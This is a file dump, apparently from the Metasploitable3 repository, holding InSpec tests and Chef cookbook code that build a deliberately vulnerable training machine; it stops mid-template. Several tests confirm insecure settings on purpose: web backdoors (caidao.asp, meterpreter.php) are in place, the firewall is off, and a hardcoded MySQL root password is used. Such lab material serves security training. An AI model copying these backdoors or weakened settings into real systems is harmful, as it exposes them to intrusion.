'dav_fs.conf', 'dav_fs.load', 'dav.load', 'dav_lock.load' ] 23 | cgi_mods + dav_mods.each do |filename| 24 | describe file("/etc/apache2/mods-enabled/#{filename}") do 25 | it { should be_symlink } 26 | end 27 | end 28 | 29 | describe command('curl http://localhost/cgi-bin/hello_world.sh') do 30 | its('stdout') { should match /Hello World!/ } 31 | end 32 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/chatbot.rb: -------------------------------------------------------------------------------- 1 | # Tests for the custom chatbot 2 | 3 | describe service('chatbot') do 4 | it { should be_running } 5 | it { should be_enabled } 6 | end 7 | 8 | # Make sure the landing page comes up 9 | describe command('curl http://localhost/chat/') do 10 | its('stdout') { should match /Please enter your name to continue/ } 11 | end 12 | 13 | #TODO: Add tests that make sure the chatbot responds to chat messages 14 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/cups.rb: -------------------------------------------------------------------------------- 1 | # Inspec Tests for cups 2 | 3 | # Tests for the service 4 | describe service'cups' do 5 | it { should be_running } 6 | it { should be_enabled } 7 | end 8 | 9 | describe port('631') do 10 | it { should be_listening } 11 | end 12 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/docker.rb: -------------------------------------------------------------------------------- 1 | describe service('docker') do 2 | it { should be_enabled } 3 | it { should be_running } 4 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/drupal.rb: -------------------------------------------------------------------------------- 1 | # InSpec Testing for Drupal 2 | 3 | describe command('curl http://localhost/drupal/') do 4 | its('stdout') { should match /metasploitable3_logo\.png/ } # Make sure it has the icon 5 | its('stdout') { should match /Metasploitable FAQs/ } # Make sure it has the title 6 | its('stdout') { should match /What else is there to do here/ } # Make sure it has the content 7 | end 8 | 9 | describe command('mysql -h 127.0.0.1 --user="root" --password="sploitme" --execute="SHOW DATABASES LIKE \'drupal\'"') do 10 | its('stdout') { should match /drupal/ } # Make sure the database exists 11 | end 12 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/knockd.rb: -------------------------------------------------------------------------------- 1 | describe service('knockd') do 2 | it { should be_enabled } 3 | # it { should be_running } # TODO: The service is running, as evidenced by the listening port, but for some reason these tests keep failing. Research why and update them. 4 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/mysql.rb: -------------------------------------------------------------------------------- 1 | describe port('3306') do 2 | it { should be_listening } 3 | end 4 | 5 | # TODO: The service is running, as evidenced by the listening port. 6 | # but for some reason these tests keep failing. Research why and update them. 7 | # describe service('mysql') do 8 | # it { should be_enabled } 9 | # it { should be_running } 10 | # end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/nodejs.rb: -------------------------------------------------------------------------------- 1 | describe package('nodejs') do 2 | it { should be_installed } 3 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/php_545.rb: -------------------------------------------------------------------------------- 1 | #TODO -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/phpmyadmin.rb: -------------------------------------------------------------------------------- 1 | describe command('curl http://localhost/phpmyadmin/') do 2 | its('stdout') { should match /logo_right\.png/ } # Make sure it has the icon 3 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/proftpd.rb: -------------------------------------------------------------------------------- 1 | describe port('21') do 2 | it { should be_listening } 3 | end 4 | 5 | describe service('proftpd') do 6 | it { should be_enabled } 7 | it { should be_running } 8 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/readme_app.rb: -------------------------------------------------------------------------------- 1 | describe service('readme_app') do 2 | it { should be_enabled } 3 | it { should be_running } 4 | end 5 | 6 | describe port('3500') do 7 | it { should be_listening } 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/ruby23.rb: -------------------------------------------------------------------------------- 1 | describe package('ruby2.3') do 2 | it { should be_installed } 3 | end 4 | 5 | describe package('ruby2.3-dev') do 6 | it { should be_installed } 7 | end 8 | 9 | describe package('bundler') do 10 | it { should be_installed } 11 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/samba.rb: -------------------------------------------------------------------------------- 1 | describe service('smbd') do 2 | it { should be_enabled } 3 | it { should be_running } 4 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/sinatra.rb: -------------------------------------------------------------------------------- 1 | describe service('sinatra') do 2 | it { should be_enabled } 3 | it { should be_running } 4 | end 5 | 6 | describe port('8181') do 7 | it { should be_listening } 8 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/unrealircd.rb: -------------------------------------------------------------------------------- 1 | describe service('unrealircd') do 2 | it { should be_enabled } 3 | it { should be_running } 4 | end 5 | 6 | describe port('6697') do 7 | it { should be_listening } 8 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/smoke/default/default_test.rb: -------------------------------------------------------------------------------- 1 | # # encoding: utf-8 2 | 3 | # Inspec test for recipe metasploitable::default 4 | 5 | # The Inspec reference, with examples and extensive documentation, can be 6 | # found at http://inspec.io/docs/reference/resources/ 7 | 8 | unless os.windows? 9 | describe user('root') do 10 | it { should exist } 11 | skip 'This is an example test, replace with your own test.' 12 | end 13 | end 14 | 15 | describe port(80) do 16 | it { should_not be_listening } 17 | skip 'This is an example test, replace with your own test.' 18 | end 19 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/smoke/default/mysql.rb: -------------------------------------------------------------------------------- 1 | # # encoding: utf-8 2 | 3 | # Inspec test for recipe metasploitable::mysql 4 | 5 | # The Inspec reference, with examples and extensive documentation, can be 6 | # found at http://inspec.io/docs/reference/resources/ 7 | 8 | unless os.windows? 9 | describe user('root') do 10 | it { should exist } 11 | skip 'This is an example test, replace with your own test.' 12 | end 13 | end 14 | 15 | describe port(80) do 16 | it { should_not be_listening } 17 | skip 'This is an example test, replace with your own test.' 18 | end 19 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/7zip.rb: -------------------------------------------------------------------------------- 1 | control "7zip" do 2 | title "Check 7zip" 3 | desc "Check if choco installed 7zip. Installation script available at /scripts/chocolatey_installs/7zip.bat" 4 | 5 | describe file('C:\\ProgramData\\chocolatey\\bin\\7z.exe') do 6 | it { should exist } 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/apache_struts.rb: -------------------------------------------------------------------------------- 1 | control "apache-struts" do 2 | title "Check if apache struts is running" 3 | desc "Check if the service is running. Installation script available at /scripts/installs/setup_apache_struts.bat" 4 | 5 | describe file('C:\\Program Files\\Apache Software Foundation\\tomcat\\apache-tomcat-8.5.12\\conf\\tomcat-users.xml') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\Apache Software Foundation\\tomcat\\apache-tomcat-8.5.12\\conf\\server.xml') do 10 | it { should exist } 11 | end 12 | 13 | describe file('C:\\Program Files\\Apache Software Foundation\\tomcat\\apache-tomcat-8.5.12\\webapps\\struts2-rest-showcase.war') do 14 | it { should exist } 15 | end 16 | 17 | describe port('8282') do 18 | it { should be_listening } 19 | end 20 | 21 | end 22 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/axis2.rb: -------------------------------------------------------------------------------- 1 | control "axis2" do 2 | title "Axis 2" 3 | desc "Check if Axis 2 webapp is installed. Installation script available at /scripts/installs/setup_axis2.bat" 4 | 5 | describe file('C:\\axis2') do 6 | it { should_not exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\Apache Software Foundation\\tomcat\\apache-tomcat-8.5.12\\webapps\\axis2') do 10 | it { should exist } 11 | end 12 | 13 | describe port('8282') do 14 | it { should be_listening } 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/backdoors.rb: -------------------------------------------------------------------------------- 1 | control "backdoors" do 2 | title "Backdoors" 3 | desc "Check if the backdoors are correctly placed. Installation script present at: /scripts/installs/install_backdoors.bat" 4 | 5 | describe file('C:\\inetpub\\wwwroot\\caidao.asp') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\wamp\\www\\mma.php') do 10 | it { should exist } 11 | end 12 | 13 | describe file('C:\\wamp\\www\\meterpreter.php') do 14 | it { should exist } 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/boxstarter.rb: -------------------------------------------------------------------------------- 1 | control "boxstarter" do 2 | title "Check BoxStarter" 3 | desc "Check if BoxStarter is installed successfully" 4 | 5 | describe file('C:\\Users\\vagrant\\AppData\\Roaming\\Boxstarter') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Users\\vagrant\\AppData\\Roaming\\Boxstarter\\BoxstarterShell.ps1') do 10 | it { should exist } 11 | end 12 | end 13 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/choco.rb: -------------------------------------------------------------------------------- 1 | control "choco" do 2 | title "Check chocolatey" 3 | desc "Checks if chocolatey has been installed successfully" 4 | 5 | describe command('choco --version') do 6 | its(:exit_status) { should eq 0 } 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/devkit.rb: -------------------------------------------------------------------------------- 1 | control "devkit" do 2 | title "Rails Server - DevKit" 3 | desc "Check if the rails server has installed along with devkit. Check the installation script at /scripts/installs/install_devkit.bat" 4 | 5 | describe file('C:\\Program Files\\Rails_Server') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\Rails_Server\\devkit') do 10 | it { should exist } 11 | end 12 | 13 | describe port('3000') do 14 | it { should be_listening } 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/disable_auto_logon.rb: -------------------------------------------------------------------------------- 1 | control "disable-auto-logon" do 2 | title "Disable Auto Logon" 3 | desc "Check if the registry is updated to disable auto logon. Configuration script available at /scripts/configs/disable-auto-logon.bat" 4 | 5 | describe command('reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon') do 6 | its('stdout') { should match ("AutoAdminLogon REG_SZ 0") } 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/disable_firewall.rb: -------------------------------------------------------------------------------- 1 | control "disable-firewall" do 2 | title "Diable firewall" 3 | desc "Disable firewall. Configuration script available at /scripts/configs/disable_firewall.bat" 4 | 5 | # There are three profiles. None of them should be in 'on' state 6 | describe command('netsh advfirewall show allprofiles state') do 7 | its('stdout') { should_not match ("ON") } 8 | end 9 | end 10 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/elasticsearch.rb: -------------------------------------------------------------------------------- 1 | control "elasticsearch" do 2 | title "ElasticSearch" 3 | desc "Check if ElasticSearch was installed correctly. Installation script available at /scripts/installs/install_elasticsearch.bat" 4 | 5 | describe file('C:\\Program Files\\elasticsearch-1.1.1') do 6 | it { should exist } 7 | end 8 | 9 | describe service('elasticsearch-service-x64') do 10 | it { should be_installed } 11 | it { should be_enabled } 12 | it { should be_running } 13 | end 14 | 15 | 16 | describe port('9200') do 17 | it { should be_listening } 18 | end 19 | end 20 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/enable_rdp.rb: -------------------------------------------------------------------------------- 1 | control "enable-rdp" do 2 | title "Enable RDP" 3 | desc "Enables RDP by modifying Registry and adding a Firewall rule. Configuration script available at /scripts/configs/enable-rdp.bat" 4 | 5 | describe command('netsh advfirewall firewall show rule name="Open Port 3389"') do 6 | its('stdout') { should match ("Enabled: Yes") } 7 | end 8 | 9 | describe registry_key('HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server') do 10 | its('fDenyTSConnections') { should eq 0 } 11 | end 12 | 13 | describe port('3389') do 14 | it { should be_listening } 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/flag_check.rb: -------------------------------------------------------------------------------- 1 | control "flags-check" do 2 | title "Check flag locations" 3 | desc "Check if the flags are correctly placed" 4 | 5 | describe file('C:\\inetpub\\wwwroot\\six_of_diamonds.zip') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\WINDOWS\\System32\\jack_of_clubs.png') do 10 | it { should exist } 11 | end 12 | 13 | describe file('C:\\Windows\\three_of_spades.png') do 14 | it { should exist } 15 | end 16 | 17 | describe file('C:\\Windows\\System32\\kingofclubs.exe') do 18 | it { should exist } 19 | end 20 | 21 | describe file('C:\\Users\\Public\\Music\\four_of_clubs.wav') do 22 | it { should exist } 23 | end 24 | 25 | describe file('C:\\inetpub\\wwwroot\\index.html') do 26 | it { should exist } 27 | end 28 | 29 | describe file('C:\\inetpub\\wwwroot\\hahaha.jpg') do 30 | it { should exist } 31 | end 32 | 33 | describe file('C:\\inetpub\\wwwroot\\iisstart.htm') do 34 | it { should_not exist } 35 | end 36 | 37 | describe file('C:\\inetpub\\wwwroot\\seven_of_hearts.html') do 38 | it { should exist } 39 | end 40 | 41 | describe file('C:\\Users\\Public\\Documents\\jack_of_hearts.docx') do 42 | it { should exist } 43 | end 44 | 45 | describe file('C:\\Users\\Public\\Documents\\seven_of_spades.pdf') do 46 | it { should exist } 47 | end 48 | 49 | describe file('C:\\Users\\Public\\Pictures\\ace_of_hearts.jpg') do 50 | it { should exist } 51 | end 52 | 53 | describe file('C:\\Users\\Public\\Pictures\\ten_of_diamonds.png') do 54 | it { should exist } 55 | end 56 | 57 | describe file('C:\\jack_of_diamonds.png') do 58 | it { should exist } 59 | end 60 | 61 | end 62 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/ftp_site.rb: -------------------------------------------------------------------------------- 1 | control "setup-ftp-site" do 2 | title "Setup FTP Site" 3 | desc "Check if the FTP site is correctly configured" 4 | 5 | describe file('C:\\Windows\\System32\\inetsrv\\config\\applicationHost.config') do 6 | it { should exist } 7 | end 8 | 9 | describe port('21') do 10 | it { should be_listening } 11 | end 12 | 13 | end 14 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/glassfish.rb: -------------------------------------------------------------------------------- 1 | control "glassfish" do 2 | title "Check GlassFish" 3 | desc "Check if the GlassFish service is correctly installed. Installation script available at /scripts/installs/setup_g" 4 | 5 | describe file("C:\\glassfish") do 6 | it { should exist } 7 | end 8 | 9 | describe file("C:\\glassfish\\glassfish4\\glassfish\\domains\\domain1\\config\\admin-keyfile") do 10 | it { should exist } 11 | end 12 | 13 | describe file("C:\\glassfish\\glassfish4\\glassfish\\domains\\domain1\\config\\domain.xml") do 14 | it { should exist } 15 | end 16 | 17 | describe service('domain1') do 18 | it { should be_installed } 19 | it { should be_enabled } 20 | it { should be_running } 21 | end 22 | 23 | # describe command('icacls "C:\glassfish"') do 24 | # its('stdout') { should match "NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F)" } 25 | # end 26 | 27 | describe port('4848') do 28 | it { should be_listening } 29 | end 30 | 31 | describe port('8080') do 32 | it { should be_listening } 33 | end 34 | 35 | describe port('8181') do 36 | it { should be_listening } 37 | end 38 | 39 | end 40 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/iis.rb: -------------------------------------------------------------------------------- 1 | control "iis" do 2 | title "IIS HTTP" 3 | desc "Checks if the IIS server has started and listening on port 80. Setup script available at /scripts/installs/setup_iis.bat" 4 | 5 | describe port('3389') do 6 | it { should be_listening } 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/java.rb: -------------------------------------------------------------------------------- 1 | control "java" do 2 | title "Check Java installation" 3 | desc "Check if java is installed. Checkout the installation script at /scripts/chocolatey_installs/java.bat" 4 | 5 | describe file('C:\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\Java\\jdk1.8.0_131\\bin\\java.exe') do 10 | it { should exist } 11 | end 12 | 13 | describe command('java -showversion') do 14 | its(:exit_status) { should eq 1 } 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/jenkins.rb: -------------------------------------------------------------------------------- 1 | control "jenkins" do 2 | title "Check jenkins" 3 | desc "Check if jenkins is installed correctly. The setup script is available at /scripts/installs/setup_jenkins.bat" 4 | 5 | describe file("C:\\Program Files\\jenkins") do 6 | it { should exist } 7 | end 8 | 9 | describe file("C:\\Program Files\\jenkins\\jenkins.war") do 10 | it { should exist } 11 | end 12 | 13 | describe file("C:\\Program Files\\jenkins\\jenkins.exe") do 14 | it { should exist } 15 | end 16 | 17 | describe service('jenkins') do 18 | it { should be_installed } 19 | it { should be_enabled } 20 | it { should be_running } 21 | end 22 | 23 | describe port('8484') do 24 | it { should be_listening } 25 | end 26 | end 27 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/jmx.rb: -------------------------------------------------------------------------------- 1 | control "jmx" do 2 | title "Check JMX installation" 3 | desc "Check if the JMX service is correctly installed. Setup script available at /scripts/installs/setup_jmx.bat" 4 | 5 | describe file('C:\\Program Files\\jmx') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\jmx\\Hello.class') do 10 | it { should exist } 11 | end 12 | 13 | describe file('C:\\Program Files\\jmx\\HelloMBean.class') do 14 | it { should exist } 15 | end 16 | 17 | describe file('C:\\Program Files\\jmx\\SimpleAgent.class') do 18 | it { should exist } 19 | end 20 | 21 | describe file('C:\\Program Files\\jmx\\jmx.exe') do 22 | it { should exist } 23 | end 24 | 25 | describe file('C:\\Program Files\\jmx\\start_jmx.bat') do 26 | it { should exist } 27 | end 28 | 29 | describe service('jmx') do 30 | it { should be_installed } 31 | it { should be_enabled } 32 | it { should be_running } 33 | end 34 | 35 | describe port('1617') do 36 | it { should be_listening } 37 | end 38 | end 39 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/manageengine.rb: -------------------------------------------------------------------------------- 1 | control "manageengine" do 2 | title "ManageEngine" 3 | desc "Check if ManageEngine is running. Installation script is available at /scripts/installs/install_manageengine.bat" 4 | 5 | describe service('MEDCServerComponent-Apache') do 6 | it { should be_installed } 7 | it { should be_enabled } 8 | it { should be_running } 9 | end 10 | 11 | describe service('MEDC Server Component - Notification Server') do 12 | it { should be_installed } 13 | it { should be_enabled } 14 | it { should be_running } 15 | end 16 | 17 | describe service('DesktopCentralServer') do 18 | it { should be_installed } 19 | it { should be_enabled } 20 | it { should be_running } 21 | end 22 | 23 | describe port('8020') do 24 | it { should be_listening } 25 | end 26 | end 27 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/mysql.rb: -------------------------------------------------------------------------------- 1 | control "mysql" do 2 | title "MySQL" 3 | desc "Check if MySQL is running properly. Installation script available at /scripts/installs/setup_mysql.bat" 4 | 5 | describe service('wampmysqld') do 6 | it { should be_installed } 7 | it { should be_enabled } 8 | it { should be_running } 9 | end 10 | 11 | describe port('3306') do 12 | it { should be_listening } 13 | end 14 | end 15 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/openjdk6.rb: -------------------------------------------------------------------------------- 1 | control "openjdk6" do 2 | title "Check OpenJDK 6" 3 | desc "Checks for the installation of OpenJDK 6. Setup file available at /scripts/installs/setup_openjdk6.bat" 4 | 5 | describe file('C:\\openjdk6\\openjdk-1.6.0-unofficial-b28-windows-amd64-installer') do 6 | it { should exist } 7 | end 8 | 9 | describe command('C:\openjdk6\openjdk-1.6.0-unofficial-b28-windows-amd64-installer\jre\bin\java.exe -version') do 10 | its('stdout') { should match "openjdk version \"1.6.0-unofficial\"" } 11 | end 12 | end 13 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/password_settings.rb: -------------------------------------------------------------------------------- 1 | control "password-settings" do 2 | title "Password settings" 3 | desc "Check if the password settings are correctly configured. Configuration script available at /scripts/configs/apply_password_settings.bat" 4 | 5 | describe command('secedit /analyze /db %windir%\securitynew.sdb /cfg C:\vagrant\resources\security_settings\secconfig.cfg /areas SECURITYPOLICY') do 6 | its(:exit_status) { should eq 1 } 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/psexec.rb: -------------------------------------------------------------------------------- 1 | control "psexec" do 2 | title "PxExec" 3 | desc "Checks if the ports 139 - NetBIOS and 445 - SMB are listening" 4 | 5 | describe port('139') do 6 | it { should be_listening } 7 | end 8 | 9 | describe port('445') do 10 | it { should be_listening } 11 | end 12 | end 13 | 14 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/rails_service.rb: -------------------------------------------------------------------------------- 1 | control "rails_service" do 2 | title "Rails Service" 3 | desc "Check if Rails service is correctly installed. Setup script available at /scripts/installs/install_rails_service.bat" 4 | 5 | describe file('C:\\Program Files\\Rails_Server\\Gemfile') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\Rails_Server\\start_rails_server.bat') do 10 | it { should exist } 11 | end 12 | 13 | describe port('3000') do 14 | it { should be_listening } 15 | end 16 | 17 | describe windows_task('rails') do 18 | it { should exist } 19 | it { should be_enabled } 20 | end 21 | end 22 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/ruby.rb: -------------------------------------------------------------------------------- 1 | control "ruby" do 2 | title "Ruby" 3 | desc "Check if ruby is installed. Installation script found at /scripts/installs/install_ruby.bat" 4 | 5 | describe file('C:\\tools\\ruby23') do 6 | it { should exist } 7 | end 8 | 9 | describe command('ruby -v') do 10 | its(:exit_status) { should eq 0 } 11 | end 12 | end 13 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/snmp.rb: -------------------------------------------------------------------------------- 1 | control "snmp" do 2 | title "Setup SNMP" 3 | desc "Check if SNMP has been set up correctly. Setup script available at /scripts/installs/setup_snmp.bat" 4 | 5 | describe registry_key('HKLM\SYSTEM\ControlSet001\services\SNMP\Parameters') do 6 | its('EnableAuthenticationTraps') { should eq 0 } 7 | end 8 | 9 | describe registry_key('HKLM\SYSTEM\ControlSet001\services\SNMP\Parameters\ValidCommunities') do 10 | its('public') { should eq 4 } 11 | end 12 | 13 | describe port('161') do 14 | it { should be_listening } 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/tomcat.rb: -------------------------------------------------------------------------------- 1 | control "tomcat" do 2 | title "Check tomcat installation" 3 | desc "Check if tomcat is installed. Installation script available at /scripts/chocolatey_installs/tomcat.bat" 4 | 5 | describe file('C:\\Program Files\\Apache Software Foundation\\tomcat') do 6 | it { should exist } 7 | end 8 | 9 | describe service('Tomcat8') do 10 | it { should be_installed } 11 | it { should be_enabled } 12 | it { should be_running } 13 | end 14 | 15 | describe port('8282') do 16 | it { should be_listening } 17 | end 18 | 19 | end 20 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/wamp.rb: -------------------------------------------------------------------------------- 1 | control "wamp" do 2 | title "Check WAMP installation" 3 | desc "Check WAMP installation. The setup script available at /scripts/installs/install_wamp.bat" 4 | 5 | describe file('C:\\wamp\\bin\\apache\\Apache2.2.21\\conf\\httpd.conf') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\wamp\\alias\\phpmyadmin.conf') do 10 | it { should exist } 11 | end 12 | 13 | describe service('wampapache') do 14 | it { should be_installed } 15 | it { should be_enabled } 16 | it { should be_running } 17 | end 18 | 19 | describe service('wampmysqld') do 20 | it { should be_installed } 21 | it { should be_enabled } 22 | it { should be_running } 23 | end 24 | 25 | #TODO: Add icacls verification 26 | 27 | describe port('8585') do 28 | it { should be_listening } 29 | end 30 | 31 | describe port('3306') do 32 | it { should be_listening } 33 | end 34 | end 35 | 36 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/webdav.rb: -------------------------------------------------------------------------------- 1 | control "webdav" do 2 | title "WebDAV" 3 | desc "Check if WebDAV is correctly installed. Installation script available at /scripts/installs/setup_webdav.bat" 4 | 5 | describe file('C:\\wamp\\www\\uploads') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\wamp\\alias\\httpd-dav.conf') do 10 | it { should exist } 11 | end 12 | 13 | describe service('wampapache') do 14 | it { should be_installed } 15 | it { should be_enabled } 16 | it { should be_running } 17 | end 18 | 19 | describe port('8585') do 20 | it { should be_listening } 21 | end 22 | end 23 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/winrm.rb: -------------------------------------------------------------------------------- 1 | control "winrm" do 2 | title "WinRM" 3 | desc "Checks if the port 5985 is listening" 4 | 5 | describe port('5985') do 6 | it { should be_listening } 7 | end 8 | 9 | end 10 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/wordpress.rb: -------------------------------------------------------------------------------- 1 | control "wordpress" do 2 | title "Check WordPress Installation" 3 | desc "Checks the wordpress installation. Setup script available in /scripts/installs/install_wordpress.bat" 4 | 5 | describe file('C:\\Program Files\\wordpress') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\wordpress\\update_ip.ps1') do 10 | it { should exist } 11 | end 12 | 13 | describe file('C:\\wamp\\www\\wordpress') do 14 | it { should exist } 15 | end 16 | 17 | describe port('8585') do 18 | it { should be_listening } 19 | end 20 | 21 | end 22 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/.foodcritic: -------------------------------------------------------------------------------- 1 | ~FC005 2 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | Please refer to 2 | https://github.com/chef-cookbooks/community_cookbook_documentation/blob/master/CONTRIBUTING.MD 3 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/libraries/mysql_base.rb: -------------------------------------------------------------------------------- 1 | module MysqlCookbook 2 | class MysqlBase < Chef::Resource 3 | require_relative 'helpers' 4 | 5 | # All resources are composites 6 | def whyrun_supported? 7 | true 8 | end 9 | 10 | ################ 11 | # Type Constants 12 | ################ 13 | 14 | Boolean = property_type( 15 | is: [true, false], 16 | default: false 17 | ) unless defined?(Boolean) 18 | 19 | ################### 20 | # Common Properties 21 | ################### 22 | property :run_group, String, default: 'mysql', desired_state: false 23 | property :run_user, String, default: 'mysql', desired_state: false 24 | property :version, String, default: lazy { default_major_version }, desired_state: false 25 | property :include_dir, String, default: lazy { default_include_dir }, desired_state: false 26 | property :major_version, String, default: lazy { major_from_full(version) }, desired_state: false 27 | 28 | action_class 29 | end 30 | end 31 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/libraries/mysql_client_installation_package.rb: -------------------------------------------------------------------------------- 1 | module MysqlCookbook 2 | class MysqlClientInstallationPackage < MysqlBase 3 | # helper methods 4 | require_relative 'helpers' 5 | include MysqlCookbook::HelpersBase 6 | 7 | # Resource properties 8 | resource_name :mysql_client_installation_package 9 | provides :mysql_client_installation, os: 'linux' 10 | provides :mysql_client, os: 'linux' 11 | 12 | property :package_name, [String, Array], default: lazy { default_client_package_name }, desired_state: false 13 | property :package_options, [String, nil], desired_state: false 14 | property :package_version, [String, nil], default: nil, desired_state: false 15 | 16 | # Actions 17 | action :create do 18 | package new_resource.package_name do 19 | version new_resource.package_version if new_resource.package_version 20 | options new_resource.package_options if new_resource.package_options 21 | action :install 22 | end 23 | end 24 | 25 | action :delete do 26 | package new_resource.package_name do 27 | action :remove 28 | end 29 | end 30 | end 31 | end 32 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/libraries/mysql_server_installation_package.rb: -------------------------------------------------------------------------------- 1 | module MysqlCookbook 2 | class MysqlServerInstallationPackage < MysqlBase 3 | # Resource properties 4 | resource_name :mysql_server_installation_package 5 | provides :mysql_server_installation, os: 'linux' 6 | 7 | property :package_name, String, default: lazy { default_server_package_name }, desired_state: false 8 | property :package_options, [String, nil], desired_state: false 9 | property :package_version, [String, nil], default: nil, desired_state: false 10 | 11 | # helper methods 12 | require_relative 'helpers' 13 | include MysqlCookbook::HelpersBase 14 | 15 | # Actions 16 | action :install do 17 | package new_resource.package_name do 18 | version new_resource.package_version if new_resource.package_version 19 | options new_resource.package_options if new_resource.package_options 20 | notifies :install, 'package[perl-Sys-Hostname-Long]', :immediately if platform_family?('suse') 21 | notifies :run, 'execute[Initial DB setup script]', :immediately if platform_family?('suse') 22 | action :install 23 | end 24 | 25 | package 'perl-Sys-Hostname-Long' do 26 | action :nothing 27 | end 28 | 29 | execute 'Initial DB setup script' do 30 | environment 'INSTANCE' => new_resource.name 31 | command '/usr/lib/mysql/mysql-systemd-helper install' 32 | action :nothing 33 | end 34 | end 35 | 36 | action :delete do 37 | package new_resource.package_name do 38 | action :remove 39 | end 40 | end 41 | end 42 | end 43 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/metadata.json: -------------------------------------------------------------------------------- 1 | {"name":"mysql","version":"8.5.1","description":"Provides mysql_service, mysql_config, and mysql_client resources","long_description":"","maintainer":"Chef Software, Inc.","maintainer_email":"cookbooks@chef.io","license":"Apache-2.0","platforms":{"redhat":">= 6.0","centos":">= 6.0","scientific":">= 6.0","oracle":">= 6.0","amazon":">= 0.0.0","fedora":">= 0.0.0","debian":">= 7.0","ubuntu":">= 12.04","opensuse":">= 13.0","opensuseleap":">= 0.0.0","suse":">= 12.0"},"dependencies":{},"recommendations":{},"suggestions":{},"conflicting":{},"providing":{},"replacing":{},"attributes":{},"groupings":{},"recipes":{},"source_url":"https://github.com/chef-cookbooks/mysql","issues_url":"https://github.com/chef-cookbooks/mysql/issues","chef_version":[[">= 12.7"]],"ohai_version":[]} -------------------------------------------------------------------------------- /chef/cookbooks/mysql/templates/default/apparmor/usr.sbin.mysqld-instance.erb: -------------------------------------------------------------------------------- 1 | /etc/<%= @mysql_name 